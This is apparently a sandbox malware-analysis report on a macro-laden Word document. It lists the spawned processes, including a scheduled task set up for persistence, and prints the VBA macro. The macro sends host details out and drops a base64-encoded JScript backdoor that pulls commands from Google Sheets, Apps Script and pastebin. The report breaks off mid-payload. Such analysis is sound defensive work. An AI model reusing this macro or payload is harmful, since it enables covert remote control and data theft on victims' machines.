Feb 3, 2017 13:21:40.892060995 CET	443	49168	172.217.22.46	192.168.1.16	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	OU=Equifax Secure Certificate Authority, O=Equifax, C=US	Tue May 21 06:00:00 CEST 2002	Tue Aug 21 06:00:00 CEST 2018	[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3052 Parent PID: 2628

General

Start time:	13:21:07
Start date:	03/02/2017
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x2f210000
File size:	1422168 bytes
MD5 hash:	113371C5AC72FCE072F707C55E7845B9
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: wscript.exe PID: 3228 Parent PID: 3052

General

Start time:	13:21:21
Start date:	03/02/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript C:\ProgramData\TransbaseOdbcDriver\TransbaseOdbcDriver.js
Imagebase:	0x747d0000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 3280 Parent PID: 3052

General

Start time:	13:21:22
Start date:	03/02/2017
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /create /tn 'SysChecks' /tr ''C:\Windows\System32\WScript.exe' 'C:\ProgramData\TransbaseOdbcDriver\starter.vbs'' /sc minute /mo 30
Imagebase:	0x990000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: NewMacros

Declaration

Line	Content
1	Attribute VB_Name = "NewMacros"

Executed Functions

Subroutine BH5qxufh333W99fghjplkWrtqzzY, APIs: 41, Strings: 7, Number of lines: 29, Relevance: 102.029

APIs	Meta Information
ScreenUpdating
Part of subcall function cuid@NewMacros: CreateObject
Part of subcall function cuid@NewMacros: GetDriveName
Part of subcall function cuid@NewMacros: GetSpecialFolder
Part of subcall function cuid@NewMacros: GetDrive
Part of subcall function cuid@NewMacros: SerialNumber
Part of subcall function cuid@NewMacros: Mid
Part of subcall function GetUserData@NewMacros: Environ$
Part of subcall function IsWin32OrWin64@NewMacros: ExecQuery
Part of subcall function IsWin32OrWin64@NewMacros: AddressWidth
Part of subcall function getOS@NewMacros: InstancesOf
Part of subcall function getOS@NewMacros: Caption
Part of subcall function sendFormData@NewMacros: CreateObject
Part of subcall function sendFormData@NewMacros: Number
Part of subcall function sendFormData@NewMacros: Err
Part of subcall function sendFormData@NewMacros: Open
Part of subcall function sendFormData@NewMacros: setRequestHeader
Part of subcall function sendFormData@NewMacros: Send
Part of subcall function sendFormData@NewMacros: ReadyState
Part of subcall function sendFormData@NewMacros: WaitForResponse
Part of subcall function sendFormData@NewMacros: StatusText
Bookmarks
Bookmarks
Shapes
Shapes
Part of subcall function folderInit@NewMacros: CreateObject
Part of subcall function folderInit@NewMacros: ExpandEnvironmentStrings
Part of subcall function folderInit@NewMacros: FreeFile
Part of subcall function ggl_runer@NewMacros: CreateObject
Part of subcall function ggl_runer@NewMacros: ExpandEnvironmentStrings
Part of subcall function ggl_runer@NewMacros: FreeFile
Part of subcall function ggl_starter@NewMacros: CreateObject
Part of subcall function ggl_starter@NewMacros: ExpandEnvironmentStrings
Part of subcall function ggl_starter@NewMacros: FreeFile
Run	Microsoft Word:Application.Run("ggl_hex")
Part of subcall function SetRegData@NewMacros: CreateObject
Part of subcall function SetRegData@NewMacros: ExpandEnvironmentStrings
Part of subcall function SetRegData@NewMacros: ExpandEnvironmentStrings
Part of subcall function SetRegData@NewMacros: RegWrite
Part of subcall function SetRegData@NewMacros: Run
ScreenUpdating

Strings	Decrypted Strings
"2017-3"
"orderBkm12"
"2017-3"
"orderBkm12"
"3037-2"
"orderBkm12"
"ggl_hex"

Line	Instruction	Meta Information
577	Sub BH5qxufh333W99fghjplkWrtqzzY()
578	Dim BI5kb0jp7 as Document	executed
578	Set BI5kb0jp7 = ActiveDocument
579	Application.ScreenUpdating = False	ScreenUpdating
581	Dim txt as String
582	txt = cuid()
583	txt = txt & " \| " & GetUserData()
584	txt = txt & " \| " & IsWin32OrWin64()
585	txt = txt & " \| " & getOS()
587	On Error Goto ErrHandler
589	Dim res
590	res = sendFormData(txt)
592	If res Then
593	ActiveDocument.Bookmarks("orderBkm12").Range.Text = "2017-3"	Bookmarks
594	Else
595	ActiveDocument.Bookmarks("orderBkm12").Range.Text = "3037-2"	Bookmarks
596	Endif
598	ActiveDocument.Shapes(1).Visible = False	Shapes
599	ActiveDocument.Shapes(2).Visible = True	Shapes
600	ErrHandler:
603	On Error Goto ErrHandler2
605	folderInit
606	ggl_runer
607	ggl_starter
609	Application.Run ("ggl_hex")	Microsoft Word:Application.Run("ggl_hex") executed
610	SetRegData
610	ErrHandler2:
624	Application.ScreenUpdating = True	ScreenUpdating
625	End Sub

Subroutine ggl_hex, APIs: 16, Strings: 5, Number of lines: 317, Relevance: 54.317

APIs	Meta Information
CreateObject	CreateObject("WScript.Shell")
ExpandEnvironmentStrings	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData
Part of subcall function CreateDir@NewMacros: Dir
Part of subcall function CreateDir@NewMacros: vbDirectory
Part of subcall function CreateDir@NewMacros: MkDir
FreeFile
Part of subcall function AP6fuezipn4@NewMacros: CreateObject
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: CreateElement
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: dataType
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: Text
Part of subcall function AP6fuezipn4@NewMacros: nodeTypedValue
Shell	Shell("wscript C:\ProgramData\TransbaseOdbcDriver\TransbaseOdbcDriver.js",0)
vbHide

Strings	Decrypted Strings
"dmFyIG9ialNXYmVtU2VydmljZXNFeCA9IEdldE9iamVjdCgid2lubWdtdHM6e2ltcGVyc29uYXR"
"WScript.Shell"
"%ALLUSERSPROFILE%"
"wscript "
"wscript "

Line	Instruction	Meta Information
246	Public Sub ggl_hex()
247	On Error Resume Next	executed
248	Dim f
248	f = "dmFyIG9ialNXYmVtU2VydmljZXNFeCA9IEdldE9iamVjdCgid2lubWdtdHM6e2ltcGVyc29uYXR"
249	f = f & "pb25MZXZlbD1pbXBlcnNvbmF0ZX0hXFxcXC5cXHJvb3RcXGNpbXYyIik7DQp2YXIgY29sbFNXYm"
250	f = f & "VtT2JqZWN0U2V0ID0gb2JqU1diZW1TZXJ2aWNlc0V4LkV4ZWNRdWVyeSggIlNFTEVDVCBOYW1lL"
251	f = f & "CBDb21tYW5kTGluZSwgUHJvY2Vzc0lEIEZST00gV2luMzJfUHJvY2VzcyBXSEVSRSBOYW1lIExJ"
252	f = f & "S0UgJyVbY3ddc2NyaXB0LmV4ZScgQU5EIENvbW1hbmRMaW5lIExJS0UgJyVbY3ddc2NyaXB0JSI"
253	f = f & "gKyBXU2NyaXB0LlNjcmlwdE5hbWUgKyAiJSciLCAiV1FMIiwgMCk7DQppZihjb2xsU1diZW1PYm"
254	f = f & "plY3RTZXQuQ291bnQgPiAxKXsgV1NjcmlwdC5RdWl0KCk7IH0NCg0KdmFyIEJhc2U2NCA9IHsNC"
255	f = f & "iANCiAgLy8gcHJpdmF0ZSBwcm9wZXJ0eQ0KICBfa2V5U3RyOiAiQUJDREVGR0hJSktMTU5PUFFS"
256	f = f & "U1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLz0iLA0KIA0KICA"
257	f = f & "vLyBwdWJsaWMgbWV0aG9kIGZvciBlbmNvZGluZw0KICBlbmNvZGU6IGZ1bmN0aW9uIChpbnB1dC"
258	f = f & "kgew0KICAgIHZhciBvdXRwdXQgPSAiIjsNCiAgICB2YXIgY2hyMSwgY2hyMiwgY2hyMywgZW5jM"
259	f = f & "SwgZW5jMiwgZW5jMywgZW5jNDsNCiAgICB2YXIgaSA9IDA7DQogDQogICAgaW5wdXQgPSBCYXNl"
260	f = f & "NjQuX3V0ZjhfZW5jb2RlKGlucHV0KTsNCiANCiAgICB3aGlsZSAoaSA8IGlucHV0Lmxlbmd0aCk"
261	f = f & "gew0KIA0KICAgICAgY2hyMSA9IGlucHV0LmNoYXJDb2RlQXQoaSsrKTsNCiAgICAgIGNocjIgPS"
262	f = f & "BpbnB1dC5jaGFyQ29kZUF0KGkrKyk7DQogICAgICBjaHIzID0gaW5wdXQuY2hhckNvZGVBdChpK"
263	f = f & "yspOw0KIA0KICAgICAgZW5jMSA9IGNocjEgPj4gMjsNCiAgICAgIGVuYzIgPSAoKGNocjEgJiAz"
264	f = f & "KSA8PCA0KSB8IChjaHIyID4+IDQpOw0KICAgICAgZW5jMyA9ICgoY2hyMiAmIDE1KSA8PCAyKSB"
265	f = f & "8IChjaHIzID4+IDYpOw0KICAgICAgZW5jNCA9IGNocjMgJiA2MzsNCiANCiAgICAgIGlmIChpc0"
266	f = f & "5hTihjaHIyKSkgew0KICAgICAgICBlbmMzID0gZW5jNCA9IDY0Ow0KICAgICAgfSBlbHNlIGlmI"
267	f = f & "Chpc05hTihjaHIzKSkgew0KICAgICAgICBlbmM0ID0gNjQ7DQogICAgICB9DQogDQogICAgICBv"
268	f = f & "dXRwdXQgPSBvdXRwdXQgKyB0aGlzLl9rZXlTdHIuY2hhckF0KGVuYzEpICsgdGhpcy5fa2V5U3R"
269	f = f & "yLmNoYXJBdChlbmMyKSArIHRoaXMuX2tleVN0ci5jaGFyQXQoZW5jMykgKyB0aGlzLl9rZXlTdH"
270	f = f & "IuY2hhckF0KGVuYzQpOw0KIA0KICAgIH0NCiANCiAgICByZXR1cm4gb3V0cHV0Ow0KICB9LA0KI"
271	f = f & "A0KICAvLyBwdWJsaWMgbWV0aG9kIGZvciBkZWNvZGluZw0KICBkZWNvZGU6IGZ1bmN0aW9uIChp"
272	f = f & "bnB1dCkgew0KICAgIHZhciBvdXRwdXQgPSAiIjsNCiAgICB2YXIgY2hyMSwgY2hyMiwgY2hyMzs"
273	f = f & "NCiAgICB2YXIgZW5jMSwgZW5jMiwgZW5jMywgZW5jNDsNCiAgICB2YXIgaSA9IDA7DQogDQogIC"
274	f = f & "AgaW5wdXQgPSBpbnB1dC5yZXBsYWNlKC9bXkEtWmEtejAtOVwrXC9cPV0vZywgIiIpOw0KIA0KI"
275	f = f & "CAgIHdoaWxlIChpIDwgaW5wdXQubGVuZ3RoKSB7DQogDQogICAgICBlbmMxID0gdGhpcy5fa2V5"
276	f = f & "U3RyLmluZGV4T2YoaW5wdXQuY2hhckF0KGkrKykpOw0KICAgICAgZW5jMiA9IHRoaXMuX2tleVN"
277	f = f & "0ci5pbmRleE9mKGlucHV0LmNoYXJBdChpKyspKTsNCiAgICAgIGVuYzMgPSB0aGlzLl9rZXlTdH"
278	f = f & "IuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7DQogICAgICBlbmM0ID0gdGhpcy5fa2V5U3RyL"
279	f = f & "mluZGV4T2YoaW5wdXQuY2hhckF0KGkrKykpOw0KIA0KICAgICAgY2hyMSA9IChlbmMxIDw8IDIp"
280	f = f & "IHwgKGVuYzIgPj4gNCk7DQogICAgICBjaHIyID0gKChlbmMyICYgMTUpIDw8IDQpIHwgKGVuYzM"
281	f = f & "gPj4gMik7DQogICAgICBjaHIzID0gKChlbmMzICYgMykgPDwgNikgfCBlbmM0Ow0KIA0KICAgIC"
282	f = f & "Agb3V0cHV0ID0gb3V0cHV0ICsgU3RyaW5nLmZyb21DaGFyQ29kZShjaHIxKTsNCiANCiAgICAgI"
283	f = f & "GlmIChlbmMzICE9IDY0KSB7DQogICAgICAgIG91dHB1dCA9IG91dHB1dCArIFN0cmluZy5mcm9t"
284	f = f & "Q2hhckNvZGUoY2hyMik7DQogICAgICB9DQogICAgICBpZiAoZW5jNCAhPSA2NCkgew0KICAgICA"
285	f = f & "gICBvdXRwdXQgPSBvdXRwdXQgKyBTdHJpbmcuZnJvbUNoYXJDb2RlKGNocjMpOw0KICAgICAgfQ"
286	f = f & "0KIA0KICAgIH0NCiANCiAgICBvdXRwdXQgPSBCYXNlNjQuX3V0ZjhfZGVjb2RlKG91dHB1dCk7D"
287	f = f & "QogDQogICAgcmV0dXJuIG91dHB1dDsNCiANCiAgfSwNCiANCiAgLy8gcHJpdmF0ZSBtZXRob2Qg"
288	f = f & "Zm9yIFVURi04IGVuY29kaW5nDQogIF91dGY4X2VuY29kZTogZnVuY3Rpb24gKHN0cmluZykgew0"
289	f = f & "KICAgIHN0cmluZyA9IHN0cmluZy5yZXBsYWNlKC9cclxuL2csICJcbiIpOw0KICAgIHZhciB1dG"
290	f = f & "Z0ZXh0ID0gIiI7DQogDQogICAgZm9yICh2YXIgbiA9IDA7IG4gPCBzdHJpbmcubGVuZ3RoOyBuK"
291	f = f & "yspIHsNCiANCiAgICAgIHZhciBjID0gc3RyaW5nLmNoYXJDb2RlQXQobik7DQogDQogICAgICBp"
292	f = f & "ZiAoYyA8IDEyOCkgew0KICAgICAgICB1dGZ0ZXh0ICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoYyk"
293	f = f & "7DQogICAgICB9IGVsc2UgaWYgKChjID4gMTI3KSAmJiAoYyA8IDIwNDgpKSB7DQogICAgICAgIH"
294	f = f & "V0ZnRleHQgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoYyA+PiA2KSB8IDE5Mik7DQogICAgICAgI"
295	f = f & "HV0ZnRleHQgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoYyAmIDYzKSB8IDEyOCk7DQogICAgICB9"
296	f = f & "IGVsc2Ugew0KICAgICAgICB1dGZ0ZXh0ICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGMgPj4gMTI"
297	f = f & "pIHwgMjI0KTsNCiAgICAgICAgdXRmdGV4dCArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyA+Pi"
298	f = f & "A2KSAmIDYzKSB8IDEyOCk7DQogICAgICAgIHV0ZnRleHQgKz0gU3RyaW5nLmZyb21DaGFyQ29kZ"
299	f = f & "SgoYyAmIDYzKSB8IDEyOCk7DQogICAgICB9DQogDQogICAgfQ0KIA0KICAgIHJldHVybiB1dGZ0"
300	f = f & "ZXh0Ow0KICB9LA0KIA0KICAvLyBwcml2YXRlIG1ldGhvZCBmb3IgVVRGLTggZGVjb2RpbmcNCiA"
301	f = f & "gX3V0ZjhfZGVjb2RlOiBmdW5jdGlvbiAodXRmdGV4dCkgew0KICAgIHZhciBzdHJpbmcgPSAiIj"
302	f = f & "sNCiAgICB2YXIgaSA9IDA7DQogICAgdmFyIGMgPSBjMSA9IGMyID0gMDsNCiANCiAgICB3aGlsZ"
303	f = f & "SAoaSA8IHV0ZnRleHQubGVuZ3RoKSB7DQogDQogICAgICBjID0gdXRmdGV4dC5jaGFyQ29kZUF0"
304	f = f & "KGkpOw0KIA0KICAgICAgaWYgKGMgPCAxMjgpIHsNCiAgICAgICAgc3RyaW5nICs9IFN0cmluZy5"
305	f = f & "mcm9tQ2hhckNvZGUoYyk7DQogICAgICAgIGkrKzsNCiAgICAgIH0gZWxzZSBpZiAoKGMgPiAxOT"
306	f = f & "EpICYmIChjIDwgMjI0KSkgew0KICAgICAgICBjMiA9IHV0ZnRleHQuY2hhckNvZGVBdChpICsgM"
307	f = f & "Sk7DQogICAgICAgIHN0cmluZyArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyAmIDMxKSA8PCA2"
308	f = f & "KSB8IChjMiAmIDYzKSk7DQogICAgICAgIGkgKz0gMjsNCiAgICAgIH0gZWxzZSB7DQogICAgICA"
309	f = f & "gIGMyID0gdXRmdGV4dC5jaGFyQ29kZUF0KGkgKyAxKTsNCiAgICAgICAgYzMgPSB1dGZ0ZXh0Lm"
310	f = f & "NoYXJDb2RlQXQoaSArIDIpOw0KICAgICAgICBzdHJpbmcgKz0gU3RyaW5nLmZyb21DaGFyQ29kZ"
311	f = f & "SgoKGMgJiAxNSkgPDwgMTIpIHwgKChjMiAmIDYzKSA8PCA2KSB8IChjMyAmIDYzKSk7DQogICAg"
312	f = f & "ICAgIGkgKz0gMzsNCiAgICAgIH0NCiANCiAgICB9DQogDQogICAgcmV0dXJuIHN0cmluZzsNCiA"
313	f = f & "gfQ0KfQ0KDQppZighQ3JlYXRlRGlyKCkpV1NjcmlwdC5RdWl0KCk7DQoNCnZhciBnaWFjID0gIj"
314	f = f & "EiOw0KdmFyIHV1aWQgPSAiMSI7DQp2YXIgZ3VpZCA9IENVSUQoKTsNCgkNCnZhciBzZXR0dGluZ"
315	f = f & "0FyciA9IGZhbHNlOw0KDQpkbyB7DQoJDQoJaWYgKCBzZXR0dGluZ0FyciApIHsNCgkgICAgR2V0"
316	f = f & "U291cmNlQ29kZShzZXR0dGluZ0Fyci5zcHJlYWRzaGVldGtleSwgc2V0dHRpbmdBcnIuZm9ybWt"
317	f = f & "leSwgc2V0dHRpbmdBcnIuZW50cnkpOw0KCX1lbHNlew0KCQlzZXR0dGluZ0FyciA9IExvYWRMaW"
318	f = f & "5rU2V0dGluZ3MoKTsJDQoJfQ0KCVdTY3JpcHQuU2xlZXAoMTAwMCo2MCpyYW5kSW50KDEsMikpO"
319	f = f & "w0KfQ0Kd2hpbGUgKDEpOw0KZnVuY3Rpb24gcmFuZEludChtaW4sIG1heCl7DQogIHJldHVybiBN"
320	f = f & "YXRoLnJvdW5kKE1hdGgucmFuZG9tKCkqKG1heC1taW4pK21pbik7DQp9DQoNCmZ1bmN0aW9uIEx"
321	f = f & "vYWRMaW5rU2V0dGluZ3MoKSB7DQoJdmFyIGdvX2NvbSA9IEluZXRSZWFkKCJodHRwczovL3Njcm"
322	f = f & "lwdC5nb29nbGUuY29tL21hY3Jvcy9zL0FLZnljYnpvSURyU3RTZWI1aUptd3N4R1pCdm9jc3c0Z"
323	f = f & "GEyRlp3MF9mcU9rUkFnd3pIN2gyYUUvZXhlYyIrICI/YmlkPSIgKyBndWlkKTsNCgl0cnkgew0K"
324	f = f & "CQlpZiggZ29fY29tWydzdGF0J10gPj0gMjAwICYmICBnb19jb21bJ3N0YXQnXSA8IDMwMCl7DQo"
325	f = f & "JCQl2YXIgY21kX3R4dCA9IGdvX2NvbVsndGV4dCddOw0KCQkJdmFyIHNldHRpbmdzQXJyID0gY2"
326	f = f & "1kX3R4dC5tYXRjaCggLyxcXHgyMnVzZXJIdG1sXFx4MjI6XFx4MjIoLispXFx4MjIsXFx4MjJuY"
327	f = f & "2MvICk7DQoJCQl2YXIgc2V0dGluZyA9IHNwbGl0KHNldHRpbmdzQXJyWzFdLCckJCQnLDMpOw0K"
328	f = f & "CQkJaWYgKHNldHRpbmcubGVuZ3RoID09IDMpIHsgDQoJCQkJcmV0dXJuIHsNCgkJCQkJICJzcHJ"
329	f = f & "lYWRzaGVldGtleSI6IHNldHRpbmdbMF0NCgkJCQkJLCJmb3Jta2V5Ijogc2V0dGluZ1sxXQ0KCQ"
330	f = f & "kJCQksImVudHJ5Ijogc2V0dGluZ1syXSANCgkJCQl9OwkJDQoJCQl9DQoJCQl2YXIgZm9ybWtle"
331	f = f & "VJlZyA9ICIxQlp1UDNWWVFqTEFJNTlEcF9POXZDSDFrZ19nUU52aEl2di1Ca21wQlRaNCI7DQoJ"
332	f = f & "CQl2YXIgZW50cnlSZWcgPSAiZW50cnkuMjAyNTg4NTkzMiI7DQoJCQlMb2dJbmV0KGd1aWQsZm9"
333	f = f & "ybWtleVJlZyxlbnRyeVJlZyk7CQkJDQoJCX0NCgl9IGNhdGNoIChlKSB7fQ0KCXJldHVybiBmYW"
334	f = f & "xzZTsJDQp9CQkNCg0KZnVuY3Rpb24gR2V0U291cmNlQ29kZShhc3ByZWFkc2hlZXRrZXksYWZvc"
335	f = f & "m1rZXksYWVudHJ5KSB7DQoNCiAgICAgICAgdmFyIEdsb2JhbE9iamVjdCA9IHRoaXM7DQogICAg"
336	f = f & "ICAgIHZhciBGU08gPSBuZXcgQWN0aXZlWE9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmp"
337	f = f & "lY3QiKTsNCiAgICAgICAgdmFyIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcH"
338	f = f & "QuU2hlbGwiKTsNCgkJDQogICAgICAgIHZhciBmb3Jta2V5ID0gYWZvcm1rZXk7DQoJCXZhciBlb"
339	f = f & "nRyeSA9IGFlbnRyeTsNCiAgICAgICAgdmFyIHNwcmVhZHNoZWV0a2V5ID0gYXNwcmVhZHNoZWV0"
340	f = f & "a2V5Ow0KDQogICAgICAgIHZhciBpbnRlcnZhbE1pbiA9IDMwOw0KICAgICAgICB2YXIgaW50ZXJ"
341	f = f & "2YWxNYXggPSA1MDsNCiAgICAgICAgdmFyIGJvdGNsYXNzID0gR2VuZXJhdGVTdHJpbmcoOCk7DQ"
342	f = f & "ogICAgICAgIHZhciBsYXN0ID0gVGV4dEZpbGVSZWFkKCIlQUxMVVNFUlNQUk9GSUxFJVxcVHJhb"
343	f = f & "nNiYXNlT2RiY0RyaXZlclxcZHR0c2cudHh0Iik7DQogICAgICAgIHZhciB2ZXJzaW9uID0gIjEu"
344	f = f & "MCI7DQoJCQ0KCQl2YXIgbGlua1BCID0gImh0dHA6Ly9wYXN0ZWJpbi5jb20vcmF3L01mUVY1ZTZ"
345	f = f & "SIjsNCgkJdmFyIGtleVBhdGggPSAiSEtFWV9DVVJSRU5UX1VTRVJcXFNvZnR3YXJlXFxNaWNyb3"
346	f = f & "NvZnRcXFdpbmRvd3NcXEN1cnJlbnRWZXJzaW9uXFxsYXN0cyI7CQkNCgkJDQogICAgICAgIFdza"
347	f = f & "FNoZWxsLkN1cnJlbnREaXJlY3RvcnkgPSBHZXRTY3JpcHREaXIoKTsNCiAgICAgICAgTG9nKCk7"
348	f = f & "DQogICAgICAgIEdldENvbW1hbmQoKTsNCgkJDQogICAgICAgIGZ1bmN0aW9uIEdldENvbW1hbmQ"
349	f = f & "oKSB7DQogICAgICAgICAgICAgICAgdHJ5IHsNCgkJCQkJCXZhciBsZWdjID0gZ2V0TGFzdEV4ZU"
350	f = f & "dvb2dDbWQoKTsNCgkJCQkJCXZhciBjbWJfb2IgPSB7fQ0KCQkJCQkJY21iX29iLmZsYWcgPSBmY"
351	f = f & "WxzZTsNCgkJCQkJCQ0KCQkJCQkJdmFyIGdvX2NvbSA9IEluZXRSZWFkKCJodHRwczovL2RvY3Mu"
352	f = f & "Z29vZ2xlLmNvbS9zcHJlYWRzaGVldC9jY2M/a2V5PSIgKyBzcHJlYWRzaGVldGtleSk7DQoJCQk"
353	f = f & "JCQlpZiggZ29fY29tWydzdGF0J10gPj0gMjAwICYmICBnb19jb21bJ3N0YXQnXSA8IDMwMCl7DQ"
354	f = f & "oJCQkJCQkJdmFyIGNtZF90eHQgPSBIVE1MUGFyc2UoZ29fY29tWyd0ZXh0J10pLmRvY3VtZW50L"
355	f = f & "mRvY3VtZW50RWxlbWVudC5pbm5lclRleHQ7DQoJCQkJCQkJdmFyIGNvbW1hbmQgPSBzcGxpdChj"
356	f = f & "bWRfdHh0LCckJCQnLDMpOwkNCgkJCQkJCQlpZiAoY29tbWFuZC5sZW5ndGggPT0gNCkgew0KCQk"
357	f = f & "JCQkJCQljbWJfb2IuYyA9IGNvbW1hbmRbMl07DQoJCQkJCQkJCWNtYl9vYi5sID0gY29tbWFuZF"
358	f = f & "sxXTsNCgkJCQkJCQkJY21iX29iLmZsYWcgPSB0cnVlOw0KCQkJCQkJCX1lbHNlew0KCQkJCQkJC"
359	f = f & "QljbWJfb2IuZmxhZyA9IGZhbHNlOw0KCQkJCQkJCX0NCgkJCQkJCQlsZWdjID0gMDsNCgkJCQkJ"
360	f = f & "CX1lbHNlew0KCQkJCQkJCWxlZ2MgPSBwYXJzZUludChsZWdjKSsxOw0KCQkJCQkJfQ0KCQkJCQk"
361	f = f & "JDQoJCQkJCQlsZWdjID0gc2V0TGFzdEV4ZUdvb2dDbWQobGVnYyk7DQoJCQkJCQlpZihsZWdjID"
362	f = f & "49IDEgJiYgbGVnYyA8PTQpcmV0dXJuOw0KCQkJCQkJDQoJCQkJCQlpZiggIWNtYl9vYi5mbGFnI"
363	f = f & "Cl7DQoJCQkJCQkJdmFyIHBiX2NvbSA9IEluZXRSZWFkKGxpbmtQQik7DQoJCQkJCQkJaWYoIHBi"
364	f = f & "X2NvbVsnc3RhdCddID49IDIwMCAmJiAgcGJfY29tWydzdGF0J10gPCAzMDApew0KCQkJCQkJCQl"
365	f = f & "2YXIganNuID0gZXZhbCAoIigiICsgcGJfY29tWyd0ZXh0J10gKyAiKSIpOw0KCQkJCQkJCQljbW"
366	f = f & "Jfb2IuYyA9IGpzblsiY29kZSJdOw0KCQkJCQkJCQljbWJfb2IubCA9IGpzblsnbGFzdCddOw0KC"
367	f = f & "QkJCQkJCQljbWJfb2IuZmxhZyA9IHRydWU7DQoJCQkJCQkJfWVsc2V7DQoJCQkJCQkJCWNtYl9v"
368	f = f & "Yi5mbGFnID0gZmFsc2U7DQoJCQkJCQkJfQ0KCQkJCQkJfQ0KCQkJCQkJDQoJCQkJCQlpZiggY21"
369	f = f & "iX29iLmZsYWcgKXsNCgkJCQkJCQlpZihsYXN0ICE9IGNtYl9vYi5sKXsNCgkJCQkJCQkJLy9sYX"
370	f = f & "N0ID0gY21iX29iLmw7DQoJCQkJCQkJCXZhciByID0gVGV4dEZpbGVDcmVhdGUoIiVBTExVU0VSU"
371	f = f & "1BST0ZJTEUlXFxUcmFuc2Jhc2VPZGJjRHJpdmVyXFxkdHRzZy50eHQiKTsNCgkJCQkJCQkJci5X"
372	f = f & "cml0ZShjbWJfb2IubCk7DQoJCQkJCQkJCXIuQ2xvc2UoKTsNCgkJCQkJCQkJTG9nKCJHZXRDb21"
373	f = f & "tYW5kOjoiICsgY21iX29iLmMpOw0KCQkJCQkJCQkvL2V2YWwoY21iX29iLmMpOw0KCQkJCQkJCQ"
374	f = f & "lpZihsYXN0ID09ICIiKXJldHVybjsNCgkJCQkJCQkJDQoJCQkJCQkJCXZhciBjb2RfZGF0YSA9I"
